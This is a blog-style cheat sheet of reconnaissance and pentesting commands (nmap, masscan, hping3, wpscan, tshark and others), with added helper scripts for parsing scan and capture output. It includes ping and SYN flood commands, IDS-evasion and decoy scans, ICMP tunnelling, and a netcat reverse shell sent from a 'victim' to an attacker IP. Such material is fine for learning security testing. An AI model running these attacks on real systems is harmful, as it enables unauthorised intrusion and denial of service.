Recon Playbook Pt.1

I was moseying down the YouTube rabbit hole one day and came across a NetworkChuck video which had a whole host of great commands for those getting going with reconnaissance + OSINT, and it occurred to me that these commands were somewhat of a playbook for getting a digital footprint on a target, plus a few fun things put into the mix. It also seems likely that I'll have further tips and tricks down the line, so I'll try and put up a part 2 soon. In the meantime, thanks to NetworkChuck for the great video - fill your boots 🥾 😁

Commands as per -> https://www.youtube.com/watch?v=gL4j-a-g9pA

PING

ping <ip_address> Ping a host to see if it’s up.

ping -s 1300 <ip_address> Set the ICMP payload size in bytes. Anything over what fits in one frame (1472 bytes of payload on a standard 1500-byte Ethernet link, once the 20-byte IP and 8-byte ICMP headers are taken off) gets fragmented, so big payloads are a quick way to see whether a firewall drops fragments or oversized ICMP.

ping -s 1300 -f <ip_address> Flood mode (-f): sends packets as fast as the replies come back, or at least a hundred a second, printing a dot per request sent and a backspace per reply received. It needs root, and it is a denial-of-service test, so only point it at hosts you are authorised to hit.

If we run iftop on the target we can watch the flood arrive. To do so, install iftop:

apt install iftop then run iftop (add -i <interface> to pick the interface to watch)

HPING

apt install hping3 Install

hping3 -S --flood -V -p 80 <ip_address> The TCP equivalent of a ping flood, i.e. a SYN flood. Here -S sets the SYN flag on each packet, --flood sends as fast as possible without waiting for replies, -V is verbose mode and -p 80 is the destination port.

hping3 --traceroute -V -1 example.com Traceroute using ICMP echo requests (-1 selects ICMP mode). Firewalls often drop ICMP, so if this stalls, send TCP SYNs (-S) to a port the target has to accept anyway, i.e. web traffic on port 80:

hping3 --traceroute -V -p 80 -S example.com

hping3 --traceroute -V -p 53 --udp example.com ...or UDP instead (--udp), here to port 53 so it looks like DNS.

PTUNNEL

apt install ptunnel Install

ptunnel carries a TCP connection inside ICMP echo request/reply packets, which is useful when a network lets ping through but nothing else. It needs raw sockets, so run it as root on both ends.

On the proxy side (the host you can reach with ping) just run ptunnel

On the client side, point ptunnel at that proxy (-p), give it a local port to listen on (-lp) and the destination host and port to reach (-da / -dp); whatever connects to the local port is then carried over ICMP to the destination.

NMAP

nmap -sn <ip_address>/<subnet> Host discovery only, no port scanning (a ping sweep) for a quick map of which hosts are up.

nmap -sV <ip_address> Service and version detection on the open ports it finds.

nmap -O <ip_address> OS detection. Nmap first checks that the host is up, so a firewall that drops the discovery probes makes it report the host as down and skip the scan altogether. In that case, skip discovery:

nmap -O -Pn <ip_address> OS detection with no host-discovery probes (-Pn treats every target as up). Note that it's a capital O, not a zero.

nmap -sL <ip_address>/<subnet> List scan: lists the targets and their reverse-DNS names without sending a single packet to them, so it's a quick, quiet way to get hostnames across a network.

nmap --script vuln <ip_address> Run the NSE scripts in the vuln category against whatever ports are open.

nmap --script malware <ip_address> Run the malware category scripts, which look for hosts already infected with known malware or backdoors.

nmap -A <ip_address> Aggressive scan: OS detection, version detection, default script scanning and traceroute in one go. Be ready to wait a looooong time...

nmap -f <ip_address> Fragment the probe packets into tiny IP fragments so a signature-based IDS has a harder job reassembling and spotting the scan (it's -f; -T is the timing template).

nmap --source-port <port> <ip_address>/<subnet> Change our source port (-g does the same). Sending from port 53, for instance, gets through badly written firewall rules that trust anything that looks like DNS.

nmap -D RND:10 <ip_address>/<subnet> DECOYS! Mixes our probes in with probes spoofed from 10 random IP addresses, so the target's logs can't tell which source is really scanning it.

MASSCAN

apt install masscan Install

masscan -p80,443,22 <ip_address>/<subnet> --rate=1000 Specify the ports to scan and the rate to scan at (packets per second).

masscan <ip_address>/<subnet> -p0-65535 --rate=1000 Scan all 65,536 ports across the whole subnet (that's a zero, not the letter O). Takes a while at this rate...

masscan -p80,443 <ip_address>/<subnet> --rate=1000 --randomize-hosts Randomise the order in which hosts are scanned, so we don't walk the subnet sequentially and stand out in the logs.

masscan -p23 <ip_address>/<subnet> --rate=1000 Find anything on the network still listening on telnet (cleartext logins: a big no-no!)
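The usual way to use masscan and nmap together is to let masscan find the open ports quickly and then run nmap -sV only against what it found. The script below is an added example of that hand-off (mine, not from the post or the NetworkChuck video): it reads masscan's list output (-oL), groups the open ports per host, emits one nmap -sV command per host and pulls out the telnet hosts from the port 23 sweep above. The masscan output lines are constructed to match the -oL format; the function names are my own.

```shell
#!/bin/sh
# Added example: feed masscan's list output into nmap -sV, one run per host.
# Real usage:  masscan -p0-65535 10.0.0.0/24 --rate=1000 -oL scan.txt
# Constructed sample of scan.txt (fields: state proto port ip timestamp).
MASSCAN_SAMPLE='#masscan
open tcp 80 10.0.0.9 1700000004
open tcp 22 10.0.0.5 1700000000
open tcp 80 10.0.0.5 1700000001
open tcp 443 10.0.0.7 1700000002
open tcp 23 10.0.0.9 1700000003
open tcp 22 10.0.0.5 1700000005
# end'

LC_ALL=C; export LC_ALL   # deterministic sort order

# stdin: masscan -oL output; stdout: "<ip> <port>,<port>,..." one line per host,
# hosts and ports sorted, duplicate (ip, port) pairs dropped.
ports_by_host() {
    grep '^open tcp ' | sort -u -k4,4 -k3,3n | awk '
        $4 != host { if (host != "") print host, ports; host = $4; ports = $3; next }
        { ports = ports "," $3 }
        END { if (host != "") print host, ports }'
}

# stdin: masscan -oL output; stdout: the nmap -sV command line for each host.
nmap_commands() {
    ports_by_host | awk '{ print "nmap -sV -p" $2 " " $1 }'
}

# stdin: masscan -oL output; stdout: hosts with telnet (tcp/23) open.
telnet_hosts() {
    awk '$1 == "open" && $2 == "tcp" && $3 == "23" { print $4 }' | sort -u
}

# To actually run the version scans against a real scan file:
#   nmap_commands < scan.txt | sh
```

Only TCP lines are picked up, since masscan's UDP results need a different nmap switch (-sU) and are best handled separately.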

ALIAS

alias ll="ls -la" Set an alias command

WHOIS

apt install whois Install

whois <domain> Get publicly available information about any domain e.g. google.com

WHATWEB

Whatweb is a webscanner. This is what it says on the github:

WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.

apt install whatweb Install

whatweb <domain> Fingerprints the site. Takes some time ⏳

CURL

curl -i <domain> Include the response headers (-i) as well as the body. Handy when you suspect an IDOR and want to compare the responses for different object IDs, when [fuzzing](https://www.imperva.com/learn/application-security/fuzzing-fuzz-testing/), and when hacking APIs to see whether an endpoint is accessible at all.

curl -i <domain> -H 'X-API-TOKEN: <api_token>' Send a custom header (an API token, say) without having to set it in the browser.
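Reading a curl -i response by eye gets old quickly, so here is an added example (mine, not from the post or the video) that scripts the checks: it reads a captured response from stdin, pulls out the status code, lists which of the standard security headers are absent and flags Set-Cookie lines missing HttpOnly or Secure. The last function is the curl -w '%{http_code}' loop you would use for the IDOR case mentioned above, requesting a run of object IDs with one user's token and watching which ones come back 200. The response text, the /api/orders/<id> path and the X-API-TOKEN header name are constructed placeholders.

```shell
#!/bin/sh
# Added example: inspect a `curl -i` response and probe an API for IDOR.
# Constructed response (not from any real server); a real one would come from
#   curl -i https://target.example/api/orders/1042 -H 'X-API-TOKEN: ...'
CURL_SAMPLE='HTTP/1.1 200 OK
Server: nginx
Content-Type: application/json
Set-Cookie: session=abc123; Path=/
Content-Length: 27

{"id":1042,"owner":"alice"}'

# stdin: full curl -i output; stdout: the 3-digit status code from the status line.
http_status() {
    tr -d '\r' | sed -n '1s/^HTTP\/[0-9.]* \([0-9]\{3\}\).*/\1/p'
}

# stdin: full curl -i output; stdout: standard security headers that are missing.
missing_security_headers() {
    hdrs=$(tr -d '\r' | sed '/^$/q' | tr 'A-Z' 'a-z')   # header block only, lowercased
    for h in strict-transport-security content-security-policy \
             x-content-type-options x-frame-options; do
        printf '%s\n' "$hdrs" | grep -q "^$h:" || echo "$h"
    done
}

# stdin: full curl -i output; stdout: names of cookies set without HttpOnly or Secure.
insecure_cookies() {
    tr -d '\r' | sed '/^$/q' | awk -F': ' '
        tolower($1) == "set-cookie" {
            v = tolower($2)
            if (v !~ /httponly/ || v !~ /secure/) { split($2, a, "="); print a[1] }
        }'
}

# IDOR probe: fetch a range of object IDs with a single user's token and print the
# status code per ID; 200s for objects that are not ours are the finding.
# Needs a live target, so the tests do not call it. Path and header are placeholders.
idor_sweep() {
    base_url=$1; token=$2; first=$3; last=$4
    i=$first
    while [ "$i" -le "$last" ]; do
        printf '%s ' "$i"
        curl -s -o /dev/null -w '%{http_code}\n' \
            -H "X-API-TOKEN: $token" "$base_url/api/orders/$i"
        i=$((i + 1))
    done
}
# usage: idor_sweep https://target.example '<api_token>' 1040 1050
```

The header checks stop at the first blank line, so a JSON body that happens to contain the words "secure" or "x-frame-options" can't skew the result.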

NIKTO

apt install nikto Install

nikto -h <domain> Set the host (-h) and let it rip!

GOBUSTER

gobuster dir -u <url> -w <wordlist> Enumerate directories and files.

gobuster dns -d <domain> -w <wordlist> Enumerate subdomains (use a DNS wordlist).

SUBLIST3R

apt install sublist3r Install

sublist3r -d <domain> Sublist3r usage.

WPSCAN

wpscan --url <domain> --enumerate u Wpscan usage (the 'u' stands for users)

wpscan --url <domain> --enumerate u,p Add 'p' to also enumerate plugins (comma-separated, no spaces). WordPress plugins are a notorious place to search for vulnerabilities.

wpscan --url <domain> --enumerate t Use 't' for themes. WordPress themes are, again, a notorious place to search for vulnerabilities.

wpscan --url <domain> --enumerate vp,vt --plugins-detection aggressive --api-token <api_token> Enumerate only the vulnerable plugins and themes (vp, vt) with aggressive plugin detection. NOTE: the vulnerability data needs a WPScan API token, which you can get by registering at wpscan.com.

AMASS

apt install amass Install

amass enum -d <domain> Active subdomain enumeration. Chucks out a whooooole lot of stuff!

amass enum -passive -d <domain> Passive mode: only queries third-party data sources and skips DNS resolution, so nothing touches the target directly.

SEARCHSPLOIT

git clone <https://gitlab.com/exploit-database/exploitdb.git> Clone the tool. If you like, you can put it in your opt folder like so:

git clone <https://gitlab.com/exploit-database/exploitdb.git> /opt/exploit-database and then put it on our PATH with a symlink: ln -sf /opt/exploit-database/searchsploit /usr/local/bin/searchsploit

You should now be able to use the tool by simply typing:

searchsploit

For example, searchsploit wordpress plugins lists every Exploit-DB entry matching those terms:

[Screenshot: output from searchsploit wordpress plugins]

You can update the database by running

searchsploit -u

TCPDUMP

tcpdump -w <name_of_file_to_write_to> -i eth0 Use -w to write the capture to a file (specifying the name) and -i for the interface you want; in this case we're using eth0.

We can then analyse the traffic using:

tcpdump -r <name_of_file_just_written>

We can also limit the number of packets captured (the -c flag stands for count):

tcpdump -i eth0 -c 100

TSHARK

NOTE: I had some issues installing this. This may be due to me running Kali on Kasm, as there are a few eccentricities with the set up, so if you’re running plain ol’ Ubuntu or any other Linux distro you may not need to do the following steps.

*apt-get update then apt-get upgrade -y (the -y answers yes to the confirmation prompt)*

Then….

apt install tshark or apt-get install tshark to install.

tshark -V -c 1 -i eth0 Here -V stands for 'verbose' mode and -c is again for 'count'. So here we're capturing just 1 packet on the eth0 interface and dumping it fully decoded.

tshark -Y 'http.request.method == "GET"' -i eth0 Capture only packets matching the display filter (-Y), here HTTP GET requests, on the given interface. To try this out, run the command, open a new terminal tab and make a curl request to an http:// URL - you'll see the request recorded by tshark.

timeout 15 tshark -i eth0 -w <file_name>.pcap Here we capture for a fixed period (15 seconds) and write (-w) the traffic to a file (name of your choosing, but remember to use the .pcap extension).

tshark -r <your_file_name>.pcap -q -z endpoints,ip Run against the file you just captured to list the IP endpoints seen and how much each sent and received (-q suppresses the per-packet output, -z asks for a statistics report).

tshark -r <your_file_name>.pcap -q -z follow,tcp,ascii,7 We can also follow a TCP stream as ASCII (the number at the end is the stream number).

tshark -e ip.src -e ip.dst -e frame.protocols -T fields -r <your_file_name>.pcap We can also output just the fields we want (-T fields, one -e per field), tab-separated, which is the easy way to feed a capture into other tools.
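To show what that fields output is good for, here is an added example (mine, not from the post or the video) that post-processes it with awk and sort: top talkers by source IP, a breakdown by the top-layer protocol in frame.protocols, and the list of flows whose top layer is a cleartext protocol (telnet, http, ftp and friends), which is what you'd want to find first on a captured segment. The sample packets are constructed to look like the tab-separated output of the command above.

```shell
#!/bin/sh
# Added example: summarise `tshark -T fields -e ip.src -e ip.dst -e frame.protocols` output.
# Real usage:
#   tshark -r capture.pcap -T fields -e ip.src -e ip.dst -e frame.protocols > flows.tsv
LC_ALL=C; export LC_ALL   # deterministic sort order

# Constructed sample of flows.tsv: one packet per line, fields tab-separated.
tshark_sample() {
    printf '%s\t%s\t%s\n' \
        10.0.0.5       93.184.216.34  eth:ethertype:ip:tcp:http \
        93.184.216.34  10.0.0.5       eth:ethertype:ip:tcp:http \
        10.0.0.5       8.8.8.8        eth:ethertype:ip:udp:dns \
        8.8.8.8        10.0.0.5       eth:ethertype:ip:udp:dns \
        10.0.0.5       10.0.0.9       eth:ethertype:ip:tcp \
        10.0.0.9       10.0.0.5       eth:ethertype:ip:tcp:telnet \
        10.0.0.5       10.0.0.9       eth:ethertype:ip:tcp:telnet
}

# stdin: flows.tsv; stdout: "<packets> <source ip>", busiest source first.
top_talkers() {
    awk -F'\t' '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -k1,1nr -k2,2
}

# stdin: flows.tsv; stdout: "<packets> <protocol>", keyed on the top layer of the stack.
protocol_breakdown() {
    awk -F'\t' '{ k = split($3, p, ":"); n[p[k]]++ }
                END { for (proto in n) print n[proto], proto }' | sort -k1,1nr -k2,2
}

# stdin: flows.tsv; stdout: unique "<src> <dst> <proto>" where the top layer is cleartext.
# The tshark display-filter equivalent is: -Y 'telnet || http || ftp || pop || imap || smtp'
cleartext_flows() {
    awk -F'\t' '{
        k = split($3, p, ":")
        if (p[k] ~ /^(telnet|http|ftp|pop|imap|smtp)$/) print $1, $2, p[k]
    }' | sort -u
}

# e.g.  cleartext_flows < flows.tsv
```

Matching on the last element of frame.protocols rather than a port number means traffic on non-standard ports is still classified by what the dissector actually decoded.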

TMUX

I’m still not convinced by tmux as I find it a little too easy to get lost, and I also find that the keyboard shortcuts are less than convivial. That said, when you get a shell, it’s quite nice to be able to run a few different views.

CTRL + B and then D to detach from current window.

tmux a to get back to it.

exit to exit tmux.

tmux new -s <name_of_session> Create and name a new session window.

tmux ls List all current active sessions.

tmux a -t <name_of_session> Go to particular session (the -t flag is for ‘target’)

CTRL + B and then W to quickly jump between tmux sessions.

SSH

ssh <username>@<ip_address> 'whoami' Run a single command on the machine without opening an interactive session, for instance see which user you land as by running 'whoami'...

ssh -D 1337 -C -q -N root@<ip_address> Make the server a SOCKS proxy (-D sets up dynamic port forwarding on the given local port, -C is for compression, -q for quiet mode and -N to not execute any remote command). Then launch Chromium using your server as its proxy:

chromium --no-sandbox --proxy-server="socks5://localhost:1337"

NETCAT

apt install netcat-traditional Install (the traditional build; the OpenBSD one doesn't have -e).

nc -lvnp <port_to_listen_on> I've used this for a while without really knowing what all the switches do. -l listens for inbound connections, -v is for verbose mode, -n is for numeric only (no DNS lookups) and -p is for the port.

Then on our victim's machine we issue the command:

nc -e /bin/bash <attacker_ip_address> <attacker_port>

-e runs the given program once the connection is up, so the bash on the victim is wired to our listener and we get a shell.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

Thanks all - hope you find the above useful!